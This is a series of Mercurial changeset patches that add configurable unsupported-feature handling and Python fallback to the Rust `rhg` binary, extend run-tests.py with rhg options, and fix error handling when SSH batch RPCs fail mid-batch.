"b89249644df056b522696b1bb9e7c18c87e8ffa3e2f0dc3b0155875d6498f01b" # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1614603095 -3600 # Mon Mar 01 13:51:35 2021 +0100 # Node ID 7284b524b441248b2c5b5480aac3f875c61dd603 # Parent 46cdd6660503fdf783a44e60186c38c41a2f384e rhg: Make configuration available as early as possible in main() Differential Revision: https://phab.mercurial-scm.org/D10090 diff --git a/rust/rhg/src/blackbox.rs b/rust/rhg/src/blackbox.rs --- a/rust/rhg/src/blackbox.rs +++ b/rust/rhg/src/blackbox.rs @@ -52,20 +52,22 @@ process_start_time: &'a ProcessStartTime, ) -> Result<Self, HgError> { let configured = if let Ok(repo) = invocation.repo { - let config = invocation.config(); - if config.get(b"extensions", b"blackbox").is_none() { + if invocation.config.get(b"extensions", b"blackbox").is_none() { // The extension is not enabled None } else { Some(ConfiguredBlackbox { repo, - max_size: config + max_size: invocation + .config .get_byte_size(b"blackbox", b"maxsize")? .unwrap_or(DEFAULT_MAX_SIZE), - max_files: config + max_files: invocation + .config .get_u32(b"blackbox", b"maxfiles")? .unwrap_or(DEFAULT_MAX_FILES), - date_format: config + date_format: invocation + .config .get_str(b"blackbox", b"date-format")? .unwrap_or(DEFAULT_DATE_FORMAT), }) diff --git a/rust/rhg/src/commands/config.rs b/rust/rhg/src/commands/config.rs --- a/rust/rhg/src/commands/config.rs +++ b/rust/rhg/src/commands/config.rs @@ -29,7 +29,7 @@ .split_2(b'.') .ok_or_else(|| HgError::abort(""))?; - let value = invocation.config().get(section, name).unwrap_or(b""); + let value = invocation.config.get(section, name).unwrap_or(b""); invocation.ui.write_stdout(&format_bytes!(b"{}\n", value))?; Ok(()) diff --git a/rust/rhg/src/main.rs b/rust/rhg/src/main.rs --- a/rust/rhg/src/main.rs +++ b/rust/rhg/src/main.rs @@ -7,7 +7,10 @@ use format_bytes::format_bytes; use hg::config::Config; use hg::repo::{Repo, RepoError}; -use std::path::{Path, PathBuf}; +use hg::utils::files::{get_bytes_from_os_str, get_path_from_bytes}; +use hg::utils::SliceExt; +use std::ffi::OsString; +use std::path::PathBuf; mod blackbox; mod error; @@ -16,10 +19,11 @@ use error::CommandError; fn main_with_result( + process_start_time: &blackbox::ProcessStartTime, ui: &ui::Ui, - process_start_time: &blackbox::ProcessStartTime, + repo: Result<&Repo, &NoRepoInCwdError>, + config: &Config, ) -> Result<(), CommandError> { - env_logger::init(); let app = App::new("rhg") .global_setting(AppSettings::AllowInvalidUtf8) .setting(AppSettings::SubcommandRequired) @@ -57,29 +61,11 @@ let subcommand_args = subcommand_matches .expect("no subcommand arguments from clap despite AppSettings::SubcommandRequired"); - let config_args = matches - .values_of_os("config") - // Turn `Option::None` into an empty iterator: - .into_iter() - .flatten() - .map(hg::utils::files::get_bytes_from_os_str); - let non_repo_config = &hg::config::Config::load(config_args)?; - - let repo_path = matches.value_of_os("repository").map(Path::new); - let repo = match Repo::find(non_repo_config, repo_path) { - Ok(repo) => Ok(repo), - Err(RepoError::NotFound { at }) if repo_path.is_none() => { - // Not finding a repo is not fatal yet, if `-R` was not given - Err(NoRepoInCwdError { cwd: at }) - } - Err(error) => return Err(error.into()), - }; - let invocation = CliInvocation { ui, subcommand_args, - non_repo_config, - repo: repo.as_ref(), + config, + repo, }; let blackbox = blackbox::Blackbox::new(&invocation, process_start_time)?; blackbox.log_command_start(); @@ -94,17 +80,36 @@ // measurements. Reading config files can be slow if they’re on NFS. let process_start_time = blackbox::ProcessStartTime::now(); + env_logger::init(); let ui = ui::Ui::new(); - let result = main_with_result(&ui, &process_start_time); - if let Err(CommandError::Abort { message }) = &result { - if !message.is_empty() { - // Ignore errors when writing to stderr, we’re already exiting - // with failure code so there’s not much more we can do. - let _ = ui.write_stderr(&format_bytes!(b"abort: {}\n", message)); + let early_args = EarlyArgs::parse(std::env::args_os()); + let non_repo_config = Config::load(early_args.config) + .unwrap_or_else(|error| exit(&ui, Err(error.into()))); + + let repo_path = early_args.repo.as_deref().map(get_path_from_bytes); + let repo_result = match Repo::find(&non_repo_config, repo_path) { + Ok(repo) => Ok(repo), + Err(RepoError::NotFound { at }) if repo_path.is_none() => { + // Not finding a repo is not fatal yet, if `-R` was not given + Err(NoRepoInCwdError { cwd: at }) } - } - std::process::exit(exit_code(&result)) + Err(error) => exit(&ui, Err(error.into())), + }; + + let config = if let Ok(repo) = &repo_result { + repo.config() + } else { + &non_repo_config + }; + + let result = main_with_result( + &process_start_time, + &ui, + repo_result.as_ref(), + config, + ); + exit(&ui, result) } fn exit_code(result: &Result<(), CommandError>) -> i32 { @@ -118,6 +123,17 @@ } } +fn exit(ui: &Ui, result: Result<(), CommandError>) -> ! { + if let Err(CommandError::Abort { message }) = &result { + if !message.is_empty() { + // Ignore errors when writing to stderr, we’re already exiting + // with failure code so there’s not much more we can do. + let _ = ui.write_stderr(&format_bytes!(b"abort: {}\n", message)); + } + } + std::process::exit(exit_code(&result)) +} + macro_rules! subcommands { ($( $command: ident )+) => { mod commands { @@ -157,7 +173,7 @@ pub struct CliInvocation<'a> { ui: &'a Ui, subcommand_args: &'a ArgMatches<'a>, - non_repo_config: &'a Config, + config: &'a Config, /// References inside `Result` is a bit peculiar but allow /// `invocation.repo?` to work out with `&CliInvocation` since this /// `Result` type is `Copy`. @@ -168,12 +184,45 @@ cwd: PathBuf, } -impl CliInvocation<'_> { - fn config(&self) -> &Config { - if let Ok(repo) = self.repo { - repo.config() - } else { - self.non_repo_config +/// CLI arguments to be parsed "early" in order to be able to read +/// configuration before using Clap. Ideally we would also use Clap for this, +/// see <https://github.com/clap-rs/clap/discussions/2366>. +/// +/// These arguments are still declared when we do use Clap later, so that Clap +/// does not return an error for their presence. +struct EarlyArgs { + /// Values of all `--config` arguments. (Possibly none) + config: Vec<Vec<u8>>, + /// Value of the `-R` or `--repository` argument, if any. + repo: Option<Vec<u8>>, +} + +impl EarlyArgs { + fn parse(args: impl IntoIterator<Item = OsString>) -> Self { + let mut args = args.into_iter().map(get_bytes_from_os_str); + let mut config = Vec::new(); + let mut repo = None; + // Use `while let` instead of `for` so that we can also call + // `args.next()` inside the loop. + while let Some(arg) = args.next() { + if arg == b"--config" { + if let Some(value) = args.next() { + config.push(value) + } + } else if let Some(value) = arg.drop_prefix(b"--config=") { + config.push(value.to_owned()) + } + + if arg == b"--repository" || arg == b"-R" { + if let Some(value) = args.next() { + repo = Some(value) + } + } else if let Some(value) = arg.drop_prefix(b"--repository=") { + repo = Some(value.to_owned()) + } else if let Some(value) = arg.drop_prefix(b"-R") { + repo = Some(value.to_owned()) + } } + Self { config, repo } } } # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1614611922 -3600 # Mon Mar 01 16:18:42 2021 +0100 # Node ID 33f2d56acc732bf97e700c48bc0bcb130351c22b # Parent 7284b524b441248b2c5b5480aac3f875c61dd603 rhg: Add a `rhg.on-unsupported` configuration key For now the two values are: * `abort-silent`: silently exit with code 252, the previous default behavior * `abort`: print an error message about what feature is not supported, then exit with code 252. Now the default. Differential Revision: https://phab.mercurial-scm.org/D10091 diff --git a/rust/rhg/src/commands/cat.rs b/rust/rhg/src/commands/cat.rs --- a/rust/rhg/src/commands/cat.rs +++ b/rust/rhg/src/commands/cat.rs @@ -60,6 +60,8 @@ invocation.ui.write_stdout(&data)?; Ok(()) } - None => Err(CommandError::Unimplemented.into()), + None => Err(CommandError::unsupported( + "`rhg cat` without `--rev` / `-r`", + )), } } diff --git a/rust/rhg/src/error.rs b/rust/rhg/src/error.rs --- a/rust/rhg/src/error.rs +++ b/rust/rhg/src/error.rs @@ -15,12 +15,11 @@ /// Exit with an error message and "standard" failure exit code. Abort { message: Vec<u8> }, - /// A mercurial capability as not been implemented. - /// - /// There is no error message printed in this case. - /// Instead, we exit with a specic status code and a wrapper script may - /// fallback to Python-based Mercurial. - Unimplemented, + /// Encountered something (such as a CLI argument, repository layout, …) + /// not supported by this version of `rhg`. Depending on configuration + /// `rhg` may attempt to silently fall back to Python-based `hg`, which + /// may or may not support this feature. + UnsupportedFeature { message: Vec<u8> }, } impl CommandError { @@ -32,20 +31,28 @@ message: utf8_to_local(message.as_ref()).into(), } } + + pub fn unsupported(message: impl AsRef<str>) -> Self { + CommandError::UnsupportedFeature { + message: utf8_to_local(message.as_ref()).into(), + } + } } /// For now we don’t differenciate between invalid CLI args and valid for `hg` /// but not supported yet by `rhg`. impl From<clap::Error> for CommandError { - fn from(_: clap::Error) -> Self { - CommandError::Unimplemented + fn from(error: clap::Error) -> Self { + CommandError::unsupported(error.to_string()) } } impl From<HgError> for CommandError { fn from(error: HgError) -> Self { match error { - HgError::UnsupportedFeature(_) => CommandError::Unimplemented, + HgError::UnsupportedFeature(message) => { + CommandError::unsupported(message) + } _ => CommandError::abort(error.to_string()), } } diff --git a/rust/rhg/src/main.rs b/rust/rhg/src/main.rs --- a/rust/rhg/src/main.rs +++ b/rust/rhg/src/main.rs @@ -84,8 +84,15 @@ let ui = ui::Ui::new(); let early_args = EarlyArgs::parse(std::env::args_os()); - let non_repo_config = Config::load(early_args.config) - .unwrap_or_else(|error| exit(&ui, Err(error.into()))); + let non_repo_config = + Config::load(early_args.config).unwrap_or_else(|error| { + // Normally this is decided based on config, but we don’t have that + // available. As of this writing config loading never returns an + // "unsupported" error but that is not enforced by the type system. + let on_unsupported = OnUnsupported::Abort; + + exit(&ui, on_unsupported, Err(error.into())) + }); let repo_path = early_args.repo.as_deref().map(get_path_from_bytes); let repo_result = match Repo::find(&non_repo_config, repo_path) { @@ -94,7 +101,11 @@ // Not finding a repo is not fatal yet, if `-R` was not given Err(NoRepoInCwdError { cwd: at }) } - Err(error) => exit(&ui, Err(error.into())), + Err(error) => exit( + &ui, + OnUnsupported::from_config(&non_repo_config), + Err(error.into()), + ), }; let config = if let Ok(repo) = &repo_result { @@ -109,7 +120,7 @@ repo_result.as_ref(), config, ); - exit(&ui, result) + exit(&ui, OnUnsupported::from_config(config), result) } fn exit_code(result: &Result<(), CommandError>) -> i32 { @@ -119,16 +130,37 @@ // Exit with a specific code and no error message to let a potential // wrapper script fallback to Python-based Mercurial. - Err(CommandError::Unimplemented) => exitcode::UNIMPLEMENTED, + Err(CommandError::UnsupportedFeature { .. }) => { + exitcode::UNIMPLEMENTED + } } } -fn exit(ui: &Ui, result: Result<(), CommandError>) -> ! { - if let Err(CommandError::Abort { message }) = &result { - if !message.is_empty() { - // Ignore errors when writing to stderr, we’re already exiting - // with failure code so there’s not much more we can do. - let _ = ui.write_stderr(&format_bytes!(b"abort: {}\n", message)); +fn exit( + ui: &Ui, + on_unsupported: OnUnsupported, + result: Result<(), CommandError>, +) -> ! { + match &result { + Ok(_) => {} + Err(CommandError::Abort { message }) => { + if !message.is_empty() { + // Ignore errors when writing to stderr, we’re already exiting + // with failure code so there’s not much more we can do. + let _ = + ui.write_stderr(&format_bytes!(b"abort: {}\n", message)); + } + } + Err(CommandError::UnsupportedFeature { message }) => { + match on_unsupported { + OnUnsupported::Abort => { + let _ = ui.write_stderr(&format_bytes!( + b"unsupported feature: {}\n", + message + )); + } + OnUnsupported::AbortSilent => {} + } } } std::process::exit(exit_code(&result)) @@ -226,3 +258,29 @@ Self { config, repo } } } + +/// What to do when encountering some unsupported feature. +/// +/// See `HgError::UnsupportedFeature` and `CommandError::UnsupportedFeature`. +enum OnUnsupported { + /// Print an error message describing what feature is not supported, + /// and exit with code 252. + Abort, + /// Silently exit with code 252. + AbortSilent, +} + +impl OnUnsupported { + fn from_config(config: &Config) -> Self { + let default = OnUnsupported::Abort; + match config.get(b"rhg", b"on-unsupported") { + Some(b"abort") => OnUnsupported::Abort, + Some(b"abort-silent") => OnUnsupported::AbortSilent, + None => default, + Some(_) => { + // TODO: warn about unknown config value + default + } + } + } +} diff --git a/tests/test-rhg.t b/tests/test-rhg.t --- a/tests/test-rhg.t +++ b/tests/test-rhg.t @@ -12,6 +12,15 @@ Unimplemented command $ rhg unimplemented-command + unsupported feature: error: Found argument 'unimplemented-command' which wasn't expected, or isn't valid in this context + + USAGE: + rhg [OPTIONS] <SUBCOMMAND> + + For more information try --help + + [252] + $ rhg unimplemented-command --config rhg.on-unsupported=abort-silent [252] Finding root @@ -153,12 +162,15 @@ $ echo indoor-pool >> .hg/requires $ rhg files + unsupported feature: repository requires feature unknown to this Mercurial: indoor-pool [252] $ rhg cat -r 1 copy_of_original + unsupported feature: repository requires feature unknown to this Mercurial: indoor-pool [252] $ rhg debugrequirements + unsupported feature: repository requires feature unknown to this Mercurial: indoor-pool [252] $ echo -e '\xFF' >> .hg/requires # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1614627366 -3600 # Mon Mar 01 20:36:06 2021 +0100 # Node ID 93e9f448273c5f716604a10c58ec899af2caf6e6 # Parent 33f2d56acc732bf97e700c48bc0bcb130351c22b rhg: Add support for automatic fallback to Python `rhg` is a command-line application that can do a small subset of what `hg` can. It is written entirely in Rust, which avoids the cost of starting a Python interpreter and importing many Python modules. In a script that runs many `hg` commands, this cost can add up. However making users decide when to use `rhg` instead of `hg` is not practical as we want the subset of supported functionality to grow over time. Instead we introduce "fallback" behavior where, when `rhg` encounters something (a sub-command, a repository format, …) that is not implemented in Rust-only, it does nothing but silently start a subprocess of Python-based `hg` running the same command. That way `rhg` becomes a drop-in replacement for `hg` that sometimes goes faster. Whether Python is used should be an implementation detail not apparent to users (other than through speed). A new `fallback` value is added to the previously introduced `rhg.on-unsupported` configuration key. When in this mode, the new `rhg.fallback-executable` config is determine what command to use to run a Python-based `hg`. The previous `rhg.on-unsupported = abort-silent` configuration was designed to let a wrapper script call `rhg` and then fall back to `hg` based on the exit code. This is still available, but having fallback behavior built-in in rhg might be easier for users instead of leaving that script "as an exercise for the reader". Using a subprocess like this is not idea, especially when `rhg` is to be installed in `$PATH` as `hg`, since the other `hg.py` executable needs to still be available… somewhere. Eventually this could be replaced by using PyOxidizer to a have a single executable that embeds a Python interpreter, but only starts it when needed. Differential Revision: https://phab.mercurial-scm.org/D10093 diff --git a/rust/rhg/src/main.rs b/rust/rhg/src/main.rs --- a/rust/rhg/src/main.rs +++ b/rust/rhg/src/main.rs @@ -11,6 +11,7 @@ use hg::utils::SliceExt; use std::ffi::OsString; use std::path::PathBuf; +use std::process::Command; mod blackbox; mod error; @@ -138,9 +139,43 @@ fn exit( ui: &Ui, - on_unsupported: OnUnsupported, + mut on_unsupported: OnUnsupported, result: Result<(), CommandError>, ) -> ! { + if let ( + OnUnsupported::Fallback { executable }, + Err(CommandError::UnsupportedFeature { .. }), + ) = (&on_unsupported, &result) + { + let mut args = std::env::args_os(); + let executable_path = get_path_from_bytes(&executable); + let this_executable = args.next().expect("exepcted argv[0] to exist"); + if executable_path == &PathBuf::from(this_executable) { + // Avoid spawning infinitely many processes until resource + // exhaustion. + let _ = ui.write_stderr(&format_bytes!( + b"Blocking recursive fallback. The 'rhg.fallback-executable = {}' config \ + points to `rhg` itself.\n", + executable + )); + on_unsupported = OnUnsupported::Abort + } else { + // `args` is now `argv[1..]` since we’ve already consumed `argv[0]` + let result = Command::new(executable_path).args(args).status(); + match result { + Ok(status) => std::process::exit( + status.code().unwrap_or(exitcode::ABORT), + ), + Err(error) => { + let _ = ui.write_stderr(&format_bytes!( + b"tried to fall back to a '{}' sub-process but got error {}\n", + executable, format_bytes::Utf8(error) + )); + on_unsupported = OnUnsupported::Abort + } + } + } + } match &result { Ok(_) => {} Err(CommandError::Abort { message }) => { @@ -160,6 +195,7 @@ )); } OnUnsupported::AbortSilent => {} + OnUnsupported::Fallback { .. } => unreachable!(), } } } @@ -268,18 +304,32 @@ Abort, /// Silently exit with code 252. AbortSilent, + /// Try running a Python implementation + Fallback { executable: Vec<u8> }, } impl OnUnsupported { + const DEFAULT: Self = OnUnsupported::Abort; + const DEFAULT_FALLBACK_EXECUTABLE: &'static [u8] = b"hg"; + fn from_config(config: &Config) -> Self { - let default = OnUnsupported::Abort; - match config.get(b"rhg", b"on-unsupported") { + match config + .get(b"rhg", b"on-unsupported") + .map(|value| value.to_ascii_lowercase()) + .as_deref() + { Some(b"abort") => OnUnsupported::Abort, Some(b"abort-silent") => OnUnsupported::AbortSilent, - None => default, + Some(b"fallback") => OnUnsupported::Fallback { + executable: config + .get(b"rhg", b"fallback-executable") + .unwrap_or(Self::DEFAULT_FALLBACK_EXECUTABLE) + .to_owned(), + }, + None => Self::DEFAULT, Some(_) => { // TODO: warn about unknown config value - default + Self::DEFAULT } } } diff --git a/tests/test-rhg.t b/tests/test-rhg.t --- a/tests/test-rhg.t +++ b/tests/test-rhg.t @@ -1,9 +1,10 @@ #require rust Define an rhg function that will only run if rhg exists + $ RHG="$RUNTESTDIR/../rust/target/release/rhg" $ rhg() { - > if [ -f "$RUNTESTDIR/../rust/target/release/rhg" ]; then - > "$RUNTESTDIR/../rust/target/release/rhg" "$@" + > if [ -f "$RHG" ]; then + > "$RHG" "$@" > else > echo "skipped: Cannot find rhg. Try to run cargo build in rust/rhg." > exit 80 @@ -151,6 +152,27 @@ $ rhg cat -r 1 copy_of_original original content +Fallback to Python + $ rhg cat original + unsupported feature: `rhg cat` without `--rev` / `-r` + [252] + $ FALLBACK="--config rhg.on-unsupported=fallback" + $ rhg cat original $FALLBACK + original content + + $ rhg cat original $FALLBACK --config rhg.fallback-executable=false + [1] + + $ rhg cat original $FALLBACK --config rhg.fallback-executable=hg-non-existent + tried to fall back to a 'hg-non-existent' sub-process but got error $ENOENT$ + unsupported feature: `rhg cat` without `--rev` / `-r` + [252] + + $ rhg cat original $FALLBACK --config rhg.fallback-executable="$RHG" + Blocking recursive fallback. The 'rhg.fallback-executable = */rust/target/release/rhg' config points to `rhg` itself. (glob) + unsupported feature: `rhg cat` without `--rev` / `-r` + [252] + Requirements $ rhg debugrequirements dotencode # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1614717072 -3600 # Tue Mar 02 21:31:12 2021 +0100 # Node ID fb23685982811dc8c1cd92f4612cea526a8e2d8f # Parent 93e9f448273c5f716604a10c58ec899af2caf6e6 tests: Add `--rhg` and `--with-rhg=<path>` options for `run-tests.py` They are mostly equivalent to the corresponding `chg` options. For now, many tests are still failing in this configuration. It is *not* run on CI. Differential Revision: https://phab.mercurial-scm.org/D10095 diff --git a/tests/run-tests.py b/tests/run-tests.py --- a/tests/run-tests.py +++ b/tests/run-tests.py @@ -540,6 +540,11 @@ action="store_true", help="show chg debug logs", ) + hgconf.add_argument( + "--rhg", + action="store_true", + help="install and use rhg Rust implementation in place of hg", + ) hgconf.add_argument("--compiler", help="compiler to build with") hgconf.add_argument( '--extra-config-opt', @@ -552,6 +557,7 @@ "--local", action="store_true", help="shortcut for --with-hg=<testdir>/../hg, " + "--with-rhg=<testdir>/../rust/target/release/rhg if --rhg is set, " "and --with-chg=<testdir>/../contrib/chg/chg if --chg is set", ) hgconf.add_argument( @@ -580,6 +586,11 @@ help="use specified chg wrapper in place of hg", ) hgconf.add_argument( + "--with-rhg", + metavar="RHG", + help="use specified rhg Rust implementation in place of hg", + ) + hgconf.add_argument( "--with-hg", metavar="HG", help="test using specified hg script rather than a " @@ -667,13 +678,17 @@ parser.error('--rust cannot be used with --no-rust') if options.local: - if options.with_hg or options.with_chg: - parser.error('--local cannot be used with --with-hg or --with-chg') + if options.with_hg or options.with_rhg or options.with_chg: + parser.error( + '--local cannot be used with --with-hg or --with-rhg or --with-chg' + ) testdir = os.path.dirname(_sys2bytes(canonpath(sys.argv[0]))) reporootdir = os.path.dirname(testdir) pathandattrs = [(b'hg', 'with_hg')] if options.chg: pathandattrs.append((b'contrib/chg/chg', 'with_chg')) + if options.rhg: + pathandattrs.append((b'rust/target/release/rhg', 'with_rhg')) for relpath, attr in pathandattrs: binpath = os.path.join(reporootdir, relpath) if os.name != 'nt' and not os.access(binpath, os.X_OK): @@ -696,6 +711,8 @@ if (options.chg or options.with_chg) and os.name == 'nt': parser.error('chg does not work on %s' % os.name) + if (options.rhg or options.with_rhg) and os.name == 'nt': + parser.error('rhg does not work on %s' % os.name) if options.with_chg: options.chg = False # no installation to temporary location options.with_chg = canonpath(_sys2bytes(options.with_chg)) @@ -704,12 +721,28 @@ and os.access(options.with_chg, os.X_OK) ): parser.error('--with-chg must specify a chg executable') + if options.with_rhg: + options.rhg = False # no installation to temporary location + options.with_rhg = canonpath(_sys2bytes(options.with_rhg)) + if not ( + os.path.isfile(options.with_rhg) + and os.access(options.with_rhg, os.X_OK) + ): + parser.error('--with-rhg must specify a rhg executable') if options.chg and options.with_hg: # chg shares installation location with hg parser.error( '--chg does not work when --with-hg is specified ' '(use --with-chg instead)' ) + if options.rhg and options.with_hg: + # rhg shares installation location with hg + parser.error( + '--rhg does not work when --with-hg is specified ' + '(use --with-rhg instead)' + ) + if options.rhg and options.chg: + parser.error('--rhg and --chg do not work together') if options.color == 'always' and not pygmentspresent: sys.stderr.write( @@ -934,6 +967,7 @@ slowtimeout=None, usechg=False, chgdebug=False, + rhg_fallback_exe=None, useipv6=False, ): """Create a test from parameters. @@ -991,6 +1025,7 @@ self._hgcommand = hgcommand or b'hg' self._usechg = usechg self._chgdebug = chgdebug + self._rhg_fallback_exe = rhg_fallback_exe self._useipv6 = useipv6 self._aborted = False @@ -1473,6 +1508,12 @@ hgrc.write(b'ipv6 = %r\n' % self._useipv6) hgrc.write(b'server-header = testing stub value\n') + if self._rhg_fallback_exe: + hgrc.write(b'[rhg]\n') + hgrc.write( + b'fallback-executable = %s\n' % self._rhg_fallback_exe + ) + for opt in self._extraconfigopts: section, key = _sys2bytes(opt).split(b'.', 1) assert b'=' in key, ( @@ -2958,6 +2999,7 @@ self._coveragefile = None self._createdfiles = [] self._hgcommand = None + self._rhg_fallback_exe = None self._hgpath = None self._portoffset = 0 self._ports = {} @@ -3098,6 +3140,16 @@ chgbindir = os.path.dirname(os.path.realpath(self.options.with_chg)) self._hgcommand = os.path.basename(self.options.with_chg) + # set fallback executable path, then replace "hg" command by "rhg" + rhgbindir = self._bindir + if self.options.rhg or self.options.with_rhg: + self._rhg_fallback_exe = os.path.join(self._bindir, self._hgcommand) + if self.options.rhg: + self._hgcommand = b'rhg' + elif self.options.with_rhg: + rhgbindir = os.path.dirname(os.path.realpath(self.options.with_rhg)) + self._hgcommand = os.path.basename(self.options.with_rhg) + osenvironb[b"BINDIR"] = self._bindir osenvironb[b"PYTHON"] = PYTHON @@ -3116,6 +3168,8 @@ path.insert(2, realdir) if chgbindir != self._bindir: path.insert(1, chgbindir) + if rhgbindir != self._bindir: + path.insert(1, rhgbindir) if self._testdir != runtestdir: path = [self._testdir] + path if self._tmpbindir != self._bindir: @@ -3423,6 +3477,7 @@ hgcommand=self._hgcommand, usechg=bool(self.options.with_chg or self.options.chg), chgdebug=self.options.chg_debug, + rhg_fallback_exe=self._rhg_fallback_exe, useipv6=useipv6, **kwds ) # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1614860813 -3600 # Thu Mar 04 13:26:53 2021 +0100 # Node ID e8cd519a0a34a1fa08a7a035fedee77b06684d16 # Parent fb23685982811dc8c1cd92f4612cea526a8e2d8f rhg: Ignore trailing newlines in .hg/sharedpath Differential Revision: https://phab.mercurial-scm.org/D10132 diff --git a/rust/hg-core/src/repo.rs b/rust/hg-core/src/repo.rs --- a/rust/hg-core/src/repo.rs +++ b/rust/hg-core/src/repo.rs @@ -1,8 +1,8 @@ use crate::config::{Config, ConfigError, ConfigParseError}; use crate::errors::{HgError, IoErrorContext, IoResultExt}; use crate::requirements; -use crate::utils::current_dir; use crate::utils::files::get_path_from_bytes; +use crate::utils::{current_dir, SliceExt}; use memmap::{Mmap, MmapOptions}; use std::collections::HashSet; use std::path::{Path, PathBuf}; @@ -118,7 +118,8 @@ store_path = dot_hg.join("store"); } else { let bytes = hg_vfs.read("sharedpath")?; - let mut shared_path = get_path_from_bytes(&bytes).to_owned(); + let mut shared_path = + get_path_from_bytes(bytes.trim_end_newlines()).to_owned(); if relative { shared_path = dot_hg.join(shared_path) } diff --git a/rust/hg-core/src/utils.rs b/rust/hg-core/src/utils.rs --- a/rust/hg-core/src/utils.rs +++ b/rust/hg-core/src/utils.rs @@ -67,6 +67,7 @@ } pub trait SliceExt { + fn trim_end_newlines(&self) -> &Self; fn trim_end(&self) -> &Self; fn trim_start(&self) -> &Self; fn trim(&self) -> &Self; @@ -80,6 +81,13 @@ } impl SliceExt for [u8] { + fn trim_end_newlines(&self) -> &[u8] { + if let Some(last) = self.iter().rposition(|&byte| byte != b'\n') { + &self[..=last] + } else { + &[] + } + } fn trim_end(&self) -> &[u8] { if let Some(last) = self.iter().rposition(is_not_whitespace) { &self[..=last] # HG changeset patch # User Valentin Gatien-Baron <vgatien-baron@janestreet.com> # Date 1614265163 18000 # Thu Feb 25 09:59:23 2021 -0500 # Node ID fe36ce0fbcdde0eb3ce019e26e5e61eb4729bc3a # Parent e8cd519a0a34a1fa08a7a035fedee77b06684d16 test: show internal exception with batchable rpcs over ssh Differential Revision: https://phab.mercurial-scm.org/D10072 diff --git a/tests/test-ssh-batch.t b/tests/test-ssh-batch.t new file mode 100644 --- /dev/null +++ b/tests/test-ssh-batch.t @@ -0,0 +1,13 @@ + $ hg init a + $ cd a + $ touch a; hg commit -qAm_ + $ hg bookmark $(for i in $($TESTDIR/seq.py 0 20); do echo b$i; done) + $ hg clone . ../b -q + $ cd ../b + +Checking that when lookup multiple bookmarks in one go, if one of them +fails (thus causing the sshpeer to be stopped), the errors from the +further lookups don't result in tracebacks. + + $ hg pull -r b0 -r nosuchbookmark $(for i in $($TESTDIR/seq.py 1 20); do echo -r b$i; done) -e "\"$PYTHON\" \"$TESTDIR/dummyssh\"" ssh://user@dummy/$(pwd)/../a |& tail -n 1 + ValueError: I/O operation on closed file # HG changeset patch # User Valentin Gatien-Baron <vgatien-baron@janestreet.com> # Date 1614265208 18000 # Thu Feb 25 10:00:08 2021 -0500 # Node ID fa30292b680ba80e32bfd3e927a8fcbd553489d4 # Parent fe36ce0fbcdde0eb3ce019e26e5e61eb4729bc3a sshpeer: don't fail forwarding output from closed connections The test still shows an internal error, but one that happens further along. Differential Revision: https://phab.mercurial-scm.org/D10073 diff --git a/mercurial/sshpeer.py b/mercurial/sshpeer.py --- a/mercurial/sshpeer.py +++ b/mercurial/sshpeer.py @@ -40,7 +40,7 @@ """display all data currently available on pipe as remote output. This is non blocking.""" - if pipe: + if pipe and not pipe.closed: s = procutil.readpipe(pipe) if s: display = ui.warn if warn else ui.status diff --git a/tests/test-ssh-batch.t b/tests/test-ssh-batch.t --- a/tests/test-ssh-batch.t +++ b/tests/test-ssh-batch.t @@ -10,4 +10,4 @@ further lookups don't result in tracebacks. $ hg pull -r b0 -r nosuchbookmark $(for i in $($TESTDIR/seq.py 1 20); do echo -r b$i; done) -e "\"$PYTHON\" \"$TESTDIR/dummyssh\"" ssh://user@dummy/$(pwd)/../a |& tail -n 1 - ValueError: I/O operation on closed file + StopIteration # HG changeset patch # User Valentin Gatien-Baron <vgatien-baron@janestreet.com> # Date 1614265713 18000 # Thu Feb 25 10:08:33 2021 -0500 # Node ID aa2e38147e8b51f0ad9a45cca345fe4c221325d7 # Parent fa30292b680ba80e32bfd3e927a8fcbd553489d4 wireprotov1peer: don't raise internal errors in some cases Specifically, when the peer is closed in the middle of a batch of rpcs. Differential Revision: https://phab.mercurial-scm.org/D10074 diff --git a/mercurial/scmutil.py b/mercurial/scmutil.py --- a/mercurial/scmutil.py +++ b/mercurial/scmutil.py @@ -201,7 +201,9 @@ msg = inst.args[1] if isinstance(msg, type(u'')): msg = pycompat.sysbytes(msg) - if not isinstance(msg, bytes): + if msg is None: + ui.error(b"\n") + elif not isinstance(msg, bytes): ui.error(b" %r\n" % (msg,)) elif not msg: ui.error(_(b" empty string\n")) diff --git a/mercurial/wireprotov1peer.py b/mercurial/wireprotov1peer.py --- a/mercurial/wireprotov1peer.py +++ b/mercurial/wireprotov1peer.py @@ -310,7 +310,7 @@ if not f.done(): f.set_exception( error.ResponseError( - _(b'unfulfilled batch command response') + _(b'unfulfilled batch command response'), None ) ) @@ -322,16 +322,27 @@ for command, f, batchable, fremote in states: # Grab raw result off the wire and teach the internal future # about it. - remoteresult = next(wireresults) - fremote.set(remoteresult) + try: + remoteresult = next(wireresults) + except StopIteration: + # This can happen in particular because next(batchable) + # in the previous iteration can call peer._abort, which + # may close the peer. + f.set_exception( + error.ResponseError( + _(b'unfulfilled batch command response'), None + ) + ) + else: + fremote.set(remoteresult) - # And ask the coroutine to decode that value. - try: - result = next(batchable) - except Exception: - pycompat.future_set_exception_info(f, sys.exc_info()[1:]) - else: - f.set_result(result) + # And ask the coroutine to decode that value. + try: + result = next(batchable) + except Exception: + pycompat.future_set_exception_info(f, sys.exc_info()[1:]) + else: + f.set_result(result) @interfaceutil.implementer( diff --git a/tests/test-ssh-batch.t b/tests/test-ssh-batch.t --- a/tests/test-ssh-batch.t +++ b/tests/test-ssh-batch.t @@ -9,5 +9,7 @@ fails (thus causing the sshpeer to be stopped), the errors from the further lookups don't result in tracebacks. - $ hg pull -r b0 -r nosuchbookmark $(for i in $($TESTDIR/seq.py 1 20); do echo -r b$i; done) -e "\"$PYTHON\" \"$TESTDIR/dummyssh\"" ssh://user@dummy/$(pwd)/../a |& tail -n 1 - StopIteration + $ hg pull -r b0 -r nosuchbookmark $(for i in $($TESTDIR/seq.py 1 20); do echo -r b$i; done) -e "\"$PYTHON\" \"$TESTDIR/dummyssh\"" ssh://user@dummy/$(pwd)/../a + pulling from ssh://user@dummy/$TESTTMP/b/../a + abort: unknown revision 'nosuchbookmark' + [255] # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 